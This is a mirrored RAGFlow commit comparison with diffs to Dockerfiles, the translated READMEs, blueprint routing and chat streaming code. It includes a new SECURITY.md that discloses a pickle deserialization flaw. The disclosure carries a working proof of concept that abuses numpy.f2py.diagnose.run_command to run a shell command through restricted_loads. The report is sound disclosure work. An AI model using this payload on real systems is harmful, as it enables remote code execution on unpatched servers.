Mirror of https://github.com/infiniflow/ragflow.git, synced 2025-12-08 20:42:30 +08:00
Compare commits
188 Commits
| SHA1 |
|---|
| 3413f43b47 |
| f8aa31b159 |
| 669d634d74 |
| 59417016a8 |
| 1eb1f7ad33 |
| 98295caffe |
| f5dc94fc85 |
| c889ef6363 |
| 593c20889d |
| fce3f6df8e |
| 61557a101a |
| 1f967191d4 |
| 0f597b9817 |
| 1cff117dc9 |
| e3f5464457 |
| 6144a109ab |
| b3ebc66b13 |
| dcb3fb2073 |
| f4674ae9d0 |
| de610091eb |
| d57a68bc2a |
| a2eb0df875 |
| edc61e9b4c |
| 472fcba7af |
| 74ec3bc4d9 |
| a3f4258cfc |
| cf542e80b3 |
| 957cd55e4a |
| 25a8c076bf |
| 306108fe0e |
| daaf6aed50 |
| 3b50389ee7 |
| 258c9ea644 |
| acd78c5ef2 |
| 1d3e4844a5 |
| 4122695a1a |
| 3ccb62910b |
| a6765e9ca4 |
| dec3bf7503 |
| 745e98e56a |
| 1defc83506 |
| 65e59862e4 |
| 477a52620f |
| 7c9ea5cad9 |
| f6159ee4d3 |
| a7423e3a94 |
| 25c4c717cb |
| f9adeb9647 |
| 04487d1bce |
| 68b9a857c2 |
| 5fa3c2bdce |
| b5389f487c |
| 8b1c145e56 |
| 92e9320657 |
| 5eb21b9c7c |
| 4542346f18 |
| fc7cc1d36c |
| 751447bd4f |
| f26d01dfa3 |
| cd3c739982 |
| 44c7a0e281 |
| 8c9b54db31 |
| 6a7c2112f7 |
| 0acf4194ca |
| 89004f1faf |
| 5a36866cf2 |
| c8523dc6fd |
| 840e921e96 |
| 5a1e01d96f |
| fbb8cbfc67 |
| 0ce720a247 |
| 47926a95ae |
| ff8793a031 |
| a95c1d45f0 |
| 45853505bb |
| b3f782b3d3 |
| 16a1d24a02 |
| a943aefa4d |
| 038ca8c0ea |
| fa5695c250 |
| e43208a1ca |
| fef663a59d |
| 83b91d90fe |
| f6ae8fcb71 |
| d1ea429bdd |
| b75bb1d8d3 |
| 6c6f5a3a47 |
| 80163c043e |
| 9fcf9a10c6 |
| 38bd02f402 |
| 9a0736b20f |
| 4fcd05ad23 |
| f8fe4154e8 |
| 57970570ee |
| d185a2e7f2 |
| a4ea5a120b |
| 15bf9f8c25 |
| 18f4a6b35c |
| f7cdb2678c |
| 3c1444ab19 |
| fb56a29478 |
| e99e8b93fb |
| 5ec19b5f53 |
| 0b90aab22c |
| fe1805fa0e |
| f73f7b969c |
| 81d1c5a695 |
| 8d667d5abd |
| 01ad2e5296 |
| fcdda9f8c5 |
| e35f7610e7 |
| 7920a5c78d |
| 4d957f2d3b |
| a89389a05a |
| d9a9be4b4c |
| 6be3626372 |
| 1eb4caf02a |
| f04fb36c26 |
| 747e69ef68 |
| c68767acdd |
| 4447039a4c |
| 90975460af |
| 7dc39cbfa6 |
| a25d32496c |
| 2023fdc13e |
| 64c83f300a |
| 3b7b6240c3 |
| e05395d2a7 |
| 169281958b |
| abcd3d2469 |
| 2cc89211f6 |
| 0e3a877e5c |
| da64cfd173 |
| ff5ea266d2 |
| 8902d92d0e |
| e28d13e3b4 |
| 0b92f02672 |
| cf2f6592dd |
| 97ced2f667 |
| 7eb69fe6d9 |
| 68a698655a |
| f900e432f3 |
| 267d6b28be |
| 706985c188 |
| 59efba3d87 |
| 22468a8590 |
| d0951ee27b |
| 31da511d1d |
| f8d0d657fb |
| 923c3b8cac |
| 2ff1b410b9 |
| f65d6a957b |
| 722c342d56 |
| dbdae8e83c |
| 6399a4fde2 |
| 631753f1a9 |
| ad87825a1b |
| b04f0510f9 |
| 1552dca28d |
| db35e9df4f |
| d9dc183a0e |
| 195498daaa |
| 4454ba7a1e |
| 72c6784ff8 |
| b6980d8a16 |
| 39ac3b1e60 |
| b8eedbdd86 |
| 8295979bb2 |
| 037657c1ce |
| 4fba0427eb |
| c74d4d683e |
| 0b15c47d70 |
| 7d41de42a1 |
| 9517a27844 |
| cc064040a2 |
| cdea1d0a85 |
| 1de31ca9f6 |
| 4ec845c0a6 |
| c58a1c48eb |
| fefe7124a1 |
| ebdc283cd5 |
| 260c68f60c |
| 5d2f7136dd |
| b85c15cc96 |
| 9ed0e50f6b |
| b9bb11879f |
| dc7afe46fb |
| 4f4d8baf49 |
.gitignore (vendored): 8 changed lines
@ -29,4 +29,10 @@ Cargo.lock
docker/ragflow-logs/
/flask_session
/logs
rag/res/deepdoc

# Exclude sdk generated files
sdk/python/ragflow.egg-info/
sdk/python/build/
sdk/python/dist/
sdk/python/ragflow_sdk.egg-info/
@ -10,6 +10,7 @@ ADD ./api ./api
ADD ./conf ./conf
ADD ./deepdoc ./deepdoc
ADD ./rag ./rag
ADD ./graph ./graph

ENV PYTHONPATH=/ragflow/
ENV HF_ENDPOINT=https://hf-mirror.com

@ -12,7 +12,7 @@ RUN apt-get update && \
    rm -rf /var/lib/apt/lists/*

RUN curl -sL https://deb.nodesource.com/setup_20.x | bash - && \
    apt-get install -y nodejs nginx ffmpeg libsm6 libxext6 libgl1
    apt-get install -y --fix-missing nodejs nginx ffmpeg libsm6 libxext6 libgl1

ADD ./web ./web
RUN cd ./web && npm i --force && npm run build

@ -21,6 +21,7 @@ ADD ./api ./api
ADD ./conf ./conf
ADD ./deepdoc ./deepdoc
ADD ./rag ./rag
ADD ./graph ./graph

ENV PYTHONPATH=/ragflow/
ENV HF_ENDPOINT=https://hf-mirror.com

@ -30,6 +30,7 @@ ADD ./conf ./conf
ADD ./deepdoc ./deepdoc
ADD ./rag ./rag
ADD ./requirements.txt ./requirements.txt
ADD ./graph ./graph

RUN apt install openmpi-bin openmpi-common libopenmpi-dev
ENV LD_LIBRARY_PATH /usr/lib/x86_64-linux-gnu/openmpi/lib:$LD_LIBRARY_PATH

@ -30,6 +30,7 @@ ADD ./conf ./conf
ADD ./deepdoc ./deepdoc
ADD ./rag ./rag
ADD ./requirements.txt ./requirements.txt
ADD ./graph ./graph

RUN dnf install -y openmpi openmpi-devel python3-openmpi
ENV C_INCLUDE_PATH /usr/include/openmpi-x86_64:$C_INCLUDE_PATH
README.md: 48 changed lines
@ -17,12 +17,20 @@
<a href="https://demo.ragflow.io" target="_blank">
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.7.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.7.0"></a>
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.8.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.8.0"></a>
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=2e6cc4" alt="license">
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
</a>
</p>

<h4 align="center">
<a href="https://ragflow.io/docs/dev/">Document</a> |
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
<a href="https://twitter.com/infiniflowai">Twitter</a> |
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
<a href="https://demo.ragflow.io">Demo</a>
</h4>

<details open>
<summary><b>📕 Table of Contents</b></summary>

@ -49,22 +57,23 @@
## 🎮 Demo

Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
</div>

## 📌 Latest Updates

- 2024-05-30 Integrates [BCE](https://github.com/netease-youdao/BCEmbedding), [BGE](https://github.com/FlagOpen/FlagEmbedding), and [Colbert](https://github.com/stanford-futuredata/ColBERT) reranker models.
- 2024-07-08 Supports [Graph](./graph/README.md).
- 2024-06-27 Supports Markdown and Docx in the Q&A parsing method. Supports extracting images from Docx files. Supports extracting tables from Markdown files.
- 2024-06-14 Supports PDF in the Q&A parsing method.
- 2024-06-06 Supports [Self-RAG](https://huggingface.co/papers/2310.11511), which is enabled by default in dialog settings.
- 2024-05-30 Integrates [BCE](https://github.com/netease-youdao/BCEmbedding) and [BGE](https://github.com/FlagOpen/FlagEmbedding) reranker models.
- 2024-05-28 Supports LLM Baichuan and VolcanoArk.
- 2024-05-23 Supports [RAPTOR](https://arxiv.org/html/2401.18059v1) for better text retrieval.
- 2024-05-21 Supports streaming output and text chunk retrieval API.
- 2024-05-15 Integrates OpenAI GPT-4o.
- 2024-05-08 Integrates LLM DeepSeek-V2.
- 2024-04-26 Adds file management.
- 2024-04-19 Supports conversation API ([detail](./docs/references/api.md)).
- 2024-04-16 Integrates an embedding model 'bce-embedding-base_v1' from [BCEmbedding](https://github.com/netease-youdao/BCEmbedding), and [FastEmbed](https://github.com/qdrant/fastembed), which is designed specifically for light and speedy embedding.
- 2024-04-11 Supports [Xinference](./docs/guides/deploy_local_llm.md) for local LLM deployment.
- 2024-04-10 Adds a new layout recognition model for analyzing legal documents.
- 2024-04-08 Supports [Ollama](./docs/guides/deploy_local_llm.md) for local LLM deployment.
- 2024-04-07 Supports Chinese UI.

## 🌟 Key Features

@ -112,7 +121,7 @@ Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).

### 🚀 Start up the server

1. Ensure `vm.max_map_count` >= 262144 ([more](./docs/guides/max_map_count.md)):
1. Ensure `vm.max_map_count` >= 262144:

> To check the value of `vm.max_map_count`:
>
@ -141,7 +150,7 @@ Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).

3. Build the pre-built Docker images and start up the server:

> Running the following commands automatically downloads the *dev* version RAGFlow Docker image. To download and run a specified Docker version, update `RAGFLOW_VERSION` in **docker/.env** to the intended version, for example `RAGFLOW_VERSION=v0.7.0`, before running the following commands.
> Running the following commands automatically downloads the *dev* version RAGFlow Docker image. To download and run a specified Docker version, update `RAGFLOW_VERSION` in **docker/.env** to the intended version, for example `RAGFLOW_VERSION=v0.8.0`, before running the following commands.

```bash
$ cd ragflow/docker
@ -176,10 +185,10 @@ Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
> If you skip this confirmation step and directly log in to RAGFlow, your browser may prompt a `network anomaly` error because, at that moment, your RAGFlow may not be fully initialized.

5. In your web browser, enter the IP address of your server and log in to RAGFlow.
> With default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number) as the default HTTP serving port `80` can be omitted when using the default configurations.
> With the default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number) as the default HTTP serving port `80` can be omitted when using the default configurations.
6. In [service_conf.yaml](./docker/service_conf.yaml), select the desired LLM factory in `user_default_llm` and update the `API_KEY` field with the corresponding API key.

> See [./docs/guides/llm_api_key_setup.md](./docs/guides/llm_api_key_setup.md) for more information.
> See [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) for more information.

_The show is now on!_

@ -291,7 +300,7 @@ To launch the service from source:
$ cd web
$ npm install --registry=https://registry.npmmirror.com --force
$ vim .umirc.ts
# Update proxy.target to 127.0.0.1:9380
# Update proxy.target to http://127.0.0.1:9380
$ npm run dev
```

@ -312,8 +321,10 @@ To launch the service from source:

## 📚 Documentation

- [Quickstart](./docs/quickstart.md)
- [FAQ](./docs/references/faq.md)
- [Quickstart](https://ragflow.io/docs/dev/)
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
- [References](https://ragflow.io/docs/dev/category/references)
- [FAQ](https://ragflow.io/docs/dev/faq)

## 📜 Roadmap

@ -323,6 +334,7 @@ See the [RAGFlow Roadmap 2024](https://github.com/infiniflow/ragflow/issues/162)

- [Discord](https://discord.gg/4XxujFgUN7)
- [Twitter](https://twitter.com/infiniflowai)
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)

## 🙌 Contributing
README_ja.md: 52 changed lines
@ -17,13 +17,21 @@
<a href="https://demo.ragflow.io" target="_blank">
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.7.0-brightgreen"
alt="docker pull infiniflow/ragflow:v0.7.0"></a>
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.8.0-brightgreen"
alt="docker pull infiniflow/ragflow:v0.8.0"></a>
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=2e6cc4" alt="license">
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
</a>
</p>

<h4 align="center">
<a href="https://ragflow.io/docs/dev/">Document</a> |
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
<a href="https://twitter.com/infiniflowai">Twitter</a> |
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
<a href="https://demo.ragflow.io">Demo</a>
</h4>

## 💡 RAGFlow とは?

[RAGFlow](https://ragflow.io/) は、深い文書理解に基づいたオープンソースの RAG (Retrieval-Augmented Generation) エンジンである。LLM(大規模言語モデル)を組み合わせることで、様々な複雑なフォーマットのデータから根拠のある引用に裏打ちされた、信頼できる質問応答機能を実現し、あらゆる規模のビジネスに適した RAG ワークフローを提供します。
@ -31,24 +39,21 @@
## 🎮 Demo

デモをお試しください:[https://demo.ragflow.io](https://demo.ragflow.io)。
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
</div>

## 📌 最新情報

- 2024-05-30 [BCE](https://github.com/netease-youdao/BCEmbedding)、[BGE](https://github.com/FlagOpen/FlagEmbedding)、[Colbert](https://github.com/stanford-futuredata/ColBERT) reranker を統合。
- 2024-07-08 [Graph](./graph/README.md) に対応しました。
- 2024-06-27 Q&A解析方式はMarkdownファイルとDocxファイルをサポートしています。Docxファイルからの画像の抽出をサポートします。Markdownファイルからテーブルを抽出することをサポートします。
- 2024-06-14 Q&A 解析メソッドは PDF ファイルをサポートしています。
- 2024-06-06 会話設定でデフォルトでチェックされている [Self-RAG](https://huggingface.co/papers/2310.11511) をサポートします。
- 2024-05-30 [BCE](https://github.com/netease-youdao/BCEmbedding) 、[BGE](https://github.com/FlagOpen/FlagEmbedding) reranker を統合。
- 2024-05-28 LLM BaichuanとVolcanoArkを統合しました。
- 2024-05-23 より良いテキスト検索のために[RAPTOR](https://arxiv.org/html/2401.18059v1)をサポート。
- 2024-05-23 より良いテキスト検索のために [RAPTOR](https://arxiv.org/html/2401.18059v1) をサポート。
- 2024-05-21 ストリーミング出力とテキストチャンク取得APIをサポート。
- 2024-05-15 OpenAI GPT-4oを統合しました。
- 2024-05-08 LLM DeepSeek-V2を統合しました。
- 2024-04-26 「ファイル管理」機能を追加しました。
- 2024-04-19 会話 API をサポートします ([詳細](./docs/references/api.md))。
- 2024-04-16 [BCEmbedding](https://github.com/netease-youdao/BCEmbedding) から埋め込みモデル「bce-embedding-base_v1」を追加します。
- 2024-04-16 [FastEmbed](https://github.com/qdrant/fastembed) は、軽量かつ高速な埋め込み用に設計されています。
- 2024-04-11 ローカル LLM デプロイメント用に [Xinference](./docs/guides/deploy_local_llm.md) をサポートします。
- 2024-04-10 メソッド「Laws」に新しいレイアウト認識モデルを追加します。
- 2024-04-08 [Ollama](./docs/guides/deploy_local_llm.md) を使用した大規模モデルのローカライズされたデプロイメントをサポートします。
- 2024-04-07 中国語インターフェースをサポートします。

## 🌟 主な特徴

@ -96,7 +101,7 @@

### 🚀 サーバーを起動

1. `vm.max_map_count` >= 262144 であることを確認する【[もっと](./docs/guides/max_map_count.md)】:
1. `vm.max_map_count` >= 262144 であることを確認する:

> `vm.max_map_count` の値をチェックするには:
>
@ -131,7 +136,7 @@
$ docker compose up -d
```

> 上記のコマンドを実行すると、RAGFlowの開発版dockerイメージが自動的にダウンロードされます。 特定のバージョンのDockerイメージをダウンロードして実行したい場合は、docker/.envファイルのRAGFLOW_VERSION変数を見つけて、対応するバージョンに変更してください。 例えば、RAGFLOW_VERSION=v0.7.0として、上記のコマンドを実行してください。
> 上記のコマンドを実行すると、RAGFlowの開発版dockerイメージが自動的にダウンロードされます。 特定のバージョンのDockerイメージをダウンロードして実行したい場合は、docker/.envファイルのRAGFLOW_VERSION変数を見つけて、対応するバージョンに変更してください。 例えば、RAGFLOW_VERSION=v0.8.0として、上記のコマンドを実行してください。

> コアイメージのサイズは約 9 GB で、ロードに時間がかかる場合があります。

@ -162,7 +167,7 @@
> デフォルトの設定を使用する場合、デフォルトの HTTP サービングポート `80` は省略できるので、与えられたシナリオでは、`http://IP_OF_YOUR_MACHINE`(ポート番号は省略)だけを入力すればよい。
6. [service_conf.yaml](./docker/service_conf.yaml) で、`user_default_llm` で希望の LLM ファクトリを選択し、`API_KEY` フィールドを対応する API キーで更新する。

> 詳しくは [./docs/guides/llm_api_key_setup.md](./docs/guides/llm_api_key_setup.md) を参照してください。
> 詳しくは [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) を参照してください。

_これで初期設定完了!ショーの開幕です!_

@ -193,7 +198,7 @@
```bash
$ git clone https://github.com/infiniflow/ragflow.git
$ cd ragflow/
$ docker build -t infiniflow/ragflow:v0.7.0 .
$ docker build -t infiniflow/ragflow:v0.8.0 .
$ cd ragflow/docker
$ chmod +x ./entrypoint.sh
$ docker compose up -d
@ -261,8 +266,10 @@ $ bash ./entrypoint.sh

## 📚 ドキュメンテーション

- [Quickstart](./docs/quickstart.md)
- [FAQ](./docs/references/faq.md)
- [Quickstart](https://ragflow.io/docs/dev/)
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
- [References](https://ragflow.io/docs/dev/category/references)
- [FAQ](https://ragflow.io/docs/dev/faq)

## 📜 ロードマップ

@ -272,6 +279,7 @@ $ bash ./entrypoint.sh

- [Discord](https://discord.gg/4XxujFgUN7)
- [Twitter](https://twitter.com/infiniflowai)
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)

## 🙌 コントリビュート
README_zh.md: 49 changed lines
@ -17,12 +17,20 @@
<a href="https://demo.ragflow.io" target="_blank">
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.7.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.7.0"></a>
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.8.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.8.0"></a>
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=2e6cc4" alt="license">
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
</a>
</p>

<h4 align="center">
<a href="https://ragflow.io/docs/dev/">Document</a> |
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
<a href="https://twitter.com/infiniflowai">Twitter</a> |
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
<a href="https://demo.ragflow.io">Demo</a>
</h4>

## 💡 RAGFlow 是什么?

[RAGFlow](https://ragflow.io/) 是一款基于深度文档理解构建的开源 RAG(Retrieval-Augmented Generation)引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程,结合大语言模型(LLM)针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。
@ -30,22 +38,22 @@
## 🎮 Demo 试用

请登录网址 [https://demo.ragflow.io](https://demo.ragflow.io) 试用 demo。
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
</div>

## 📌 近期更新

- 2024-05-30 集成 [BCE](https://github.com/netease-youdao/BCEmbedding), [BGE](https://github.com/FlagOpen/FlagEmbedding) 和 [Colbert](https://github.com/stanford-futuredata/ColBERT) 重排序模型。
- 2024-07-08 支持 [Graph](./graph/README.md)。
- 2024-06-27 Q&A 解析方式支持 Markdown 文件和 Docx 文件。支持提取出 Docx 文件中的图片。支持提取出 Markdown 文件中的表格。
- 2024-06-14 Q&A 解析方式支持 PDF 文件。
- 2024-06-06 支持 [Self-RAG](https://huggingface.co/papers/2310.11511) ,在对话设置里面默认勾选。
- 2024-05-30 集成 [BCE](https://github.com/netease-youdao/BCEmbedding) 和 [BGE](https://github.com/FlagOpen/FlagEmbedding) 重排序模型。
- 2024-05-28 集成大模型 Baichuan 和火山方舟。
- 2024-05-23 实现 [RAPTOR](https://arxiv.org/html/2401.18059v1) 提供更好的文本检索。
- 2024-05-21 支持流式结果输出和文本块获取API。
- 2024-05-15 集成大模型 OpenAI GPT-4o。
- 2024-05-08 集成大模型 DeepSeek。
- 2024-04-26 增添了‘文件管理’功能。
- 2024-04-19 支持对话 API ([更多](./docs/references/api.md))。
- 2024-04-16 集成嵌入模型 [BCEmbedding](https://github.com/netease-youdao/BCEmbedding) 和 专为轻型和高速嵌入而设计的 [FastEmbed](https://github.com/qdrant/fastembed)。
- 2024-04-11 支持用 [Xinference](./docs/guides/deploy_local_llm.md) 本地化部署大模型。
- 2024-04-10 为‘Laws’版面分析增加了底层模型。
- 2024-04-08 支持用 [Ollama](./docs/guides/deploy_local_llm.md) 本地化部署大模型。
- 2024-04-07 支持中文界面。

## 🌟 主要功能

@ -66,7 +74,7 @@

### 🍔 **兼容各类异构数据源**

- 支持丰富的文件类型,包括 Word 文档、PPT、excel 表格、txt 文件、图片、PDF、影印件、复印件、结构化数据, 网页等。
- 支持丰富的文件类型,包括 Word 文档、PPT、excel 表格、txt 文件、图片、PDF、影印件、复印件、结构化数据、网页等。

### 🛀 **全程无忧、自动化的 RAG 工作流**

@ -93,7 +101,7 @@

### 🚀 启动服务器

1. 确保 `vm.max_map_count` 不小于 262144 【[更多](./docs/guides/max_map_count.md)】:
1. 确保 `vm.max_map_count` 不小于 262144:

> 如需确认 `vm.max_map_count` 的大小:
>
@ -128,7 +136,7 @@
$ docker compose -f docker-compose-CN.yml up -d
```

> 请注意,运行上述命令会自动下载 RAGFlow 的开发版本 docker 镜像。如果你想下载并运行特定版本的 docker 镜像,请在 docker/.env 文件中找到 RAGFLOW_VERSION 变量,将其改为对应版本。例如 RAGFLOW_VERSION=v0.7.0,然后运行上述命令。
> 请注意,运行上述命令会自动下载 RAGFlow 的开发版本 docker 镜像。如果你想下载并运行特定版本的 docker 镜像,请在 docker/.env 文件中找到 RAGFLOW_VERSION 变量,将其改为对应版本。例如 RAGFLOW_VERSION=v0.8.0,然后运行上述命令。

> 核心镜像文件大约 9 GB,可能需要一定时间拉取。请耐心等待。

@ -159,7 +167,7 @@
> 上面这个例子中,您只需输入 http://IP_OF_YOUR_MACHINE 即可:未改动过配置则无需输入端口(默认的 HTTP 服务端口 80)。
6. 在 [service_conf.yaml](./docker/service_conf.yaml) 文件的 `user_default_llm` 栏配置 LLM factory,并在 `API_KEY` 栏填写和你选择的大模型相对应的 API key。

> 详见 [./docs/guides/llm_api_key_setup.md](./docs/guides/llm_api_key_setup.md)。
> 详见 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)。

_好戏开始,接着奏乐接着舞!_

@ -190,7 +198,7 @@
```bash
$ git clone https://github.com/infiniflow/ragflow.git
$ cd ragflow/
$ docker build -t infiniflow/ragflow:v0.7.0 .
$ docker build -t infiniflow/ragflow:v0.8.0 .
$ cd ragflow/docker
$ chmod +x ./entrypoint.sh
$ docker compose up -d
@ -260,7 +268,7 @@ $ bash ./entrypoint.sh
$ cd web
$ npm install --registry=https://registry.npmmirror.com --force
$ vim .umirc.ts
# 修改proxy.target为127.0.0.1:9380
# 修改proxy.target为http://127.0.0.1:9380
$ npm run dev
```

@ -279,8 +287,10 @@ $ systemctl start nginx
```
## 📚 技术文档

- [Quickstart](./docs/quickstart.md)
- [FAQ](./docs/references/faq.md)
- [Quickstart](https://ragflow.io/docs/dev/)
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
- [References](https://ragflow.io/docs/dev/category/references)
- [FAQ](https://ragflow.io/docs/dev/faq)

## 📜 路线图

@ -290,6 +300,7 @@ $ systemctl start nginx

- [Discord](https://discord.gg/4XxujFgUN7)
- [Twitter](https://twitter.com/infiniflowai)
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)

## 🙌 贡献指南
SECURITY.md (new file): 74 changed lines
@ -0,0 +1,74 @@
# Security Policy

## Supported Versions

Use this section to tell people about which versions of your project are
currently being supported with security updates.

| Version | Supported          |
| ------- | ------------------ |
| <=0.7.0 | :white_check_mark: |

## Reporting a Vulnerability

### Branch name

main

### Actual behavior

The restricted_loads function at [api/utils/__init__.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215) is still vulnerable, leading to code execution.
The main reason is that the numpy module has a numpy.f2py.diagnose.run_command function that directly executes commands, but the restricted_loads function allows users to import functions from the numpy module.

### Steps to reproduce

**ragflow_patch.py**

```py
import builtins
import io
import pickle

safe_module = {
    'numpy',
    'rag_flow'
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        import importlib
        if module.split('.')[0] in safe_module:
            _module = importlib.import_module(module)
            return getattr(_module, name)
        # Forbid everything else.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
                                     (module, name))


def restricted_loads(src):
    """Helper function analogous to pickle.loads()."""
    return RestrictedUnpickler(io.BytesIO(src)).load()
```

Then, **PoC.py**

```py
import pickle
from ragflow_patch import restricted_loads


class Exploit:
    def __reduce__(self):
        import numpy.f2py.diagnose
        return numpy.f2py.diagnose.run_command, ('whoami', )


Payload = pickle.dumps(Exploit())
restricted_loads(Payload)
```

**Result**


### Additional information

#### How to prevent?

Strictly filter the module and name before calling the getattr function.
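The filtering suggested above can be made concrete with an allowlist of exact globals. Below is a minimal sketch, not RAGFlow's actual patch: the `SAFE_GLOBALS` entries are illustrative placeholders, and the point is that `find_class` admits only named `(module, name)` pairs instead of every attribute reachable under an allowed top-level package, so helpers such as `numpy.f2py.diagnose.run_command` can no longer be resolved.

```py
import io
import importlib
import pickle

# Illustrative allowlist of exact (module, name) pairs; a real deployment
# would enumerate only the globals its pickles legitimately need.
SAFE_GLOBALS = {
    ("numpy", "dtype"),
    ("numpy.core.multiarray", "_reconstruct"),
}


class StrictUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return getattr(importlib.import_module(module), name)
        # Anything not explicitly listed is rejected.
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def strict_loads(src: bytes):
    """Stricter analogue of the permissive restricted_loads above."""
    return StrictUnpickler(io.BytesIO(src)).load()
```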
@ -63,12 +63,17 @@ login_manager.init_app(app)


def search_pages_path(pages_dir):
    return [path for path in pages_dir.glob('*_app.py') if not path.name.startswith('.')]
    app_path_list = [path for path in pages_dir.glob('*_app.py') if not path.name.startswith('.')]
    api_path_list = [path for path in pages_dir.glob('*_api.py') if not path.name.startswith('.')]
    app_path_list.extend(api_path_list)
    return app_path_list


def register_page(page_path):
    page_name = page_path.stem.rstrip('_app')
    module_name = '.'.join(page_path.parts[page_path.parts.index('api'):-1] + (page_name, ))
    path = f'{page_path}'

    page_name = page_path.stem.rstrip('_api') if "_api" in path else page_path.stem.rstrip('_app')
    module_name = '.'.join(page_path.parts[page_path.parts.index('api'):-1] + (page_name,))

    spec = spec_from_file_location(module_name, page_path)
    page = module_from_spec(spec)
@ -76,9 +81,8 @@ def register_page(page_path):
    page.manager = Blueprint(page_name, module_name)
    sys.modules[module_name] = page
    spec.loader.exec_module(page)

    page_name = getattr(page, 'page_name', page_name)
    url_prefix = f'/{API_VERSION}/{page_name}'
    url_prefix = f'/api/{API_VERSION}/{page_name}' if "_api" in path else f'/{API_VERSION}/{page_name}'

    app.register_blueprint(page.manager, url_prefix=url_prefix)
    return url_prefix
@ -86,7 +90,7 @@ def register_page(page_path):

pages_dir = [
    Path(__file__).parent,
    Path(__file__).parent.parent / 'api' / 'apps',
    Path(__file__).parent.parent / 'api' / 'apps',  # FIXME: ragflow/api/api/apps, can be remove?
]

client_urls_prefix = [
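To see what the suffix handling above produces, here is a small standalone sketch. It assumes `API_VERSION` is `'v1'`, which is an assumption for illustration only; note also that `rstrip` strips a character set rather than a literal suffix, which happens to work here because these module stems do not end in stray `'a'`, `'p'`, `'i'`, or `'_'` characters.

```py
from pathlib import Path

API_VERSION = 'v1'  # assumed value, for illustration only

for fname in ['canvas_app.py', 'dataset_api.py']:
    page_path = Path('api/apps') / fname
    path = f'{page_path}'
    # Same derivation as register_page above.
    page_name = page_path.stem.rstrip('_api') if "_api" in path else page_path.stem.rstrip('_app')
    url_prefix = f'/api/{API_VERSION}/{page_name}' if "_api" in path else f'/{API_VERSION}/{page_name}'
    print(page_name, url_prefix)

# canvas /v1/canvas
# dataset /api/v1/dataset
```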
@ -198,15 +198,18 @@ def completion():
        else: conv.reference[-1] = ans["reference"]
        conv.message[-1] = {"role": "assistant", "content": ans["answer"]}

    def rename_field(ans):
        for chunk_i in ans['reference'].get('chunks', []):
            chunk_i['doc_name'] = chunk_i['docnm_kwd']
            chunk_i.pop('docnm_kwd')

    def stream():
        nonlocal dia, msg, req, conv
        try:
            for ans in chat(dia, msg, True, **req):
                fillin_conv(ans)
                for chunk_i in ans['reference'].get('chunks', []):
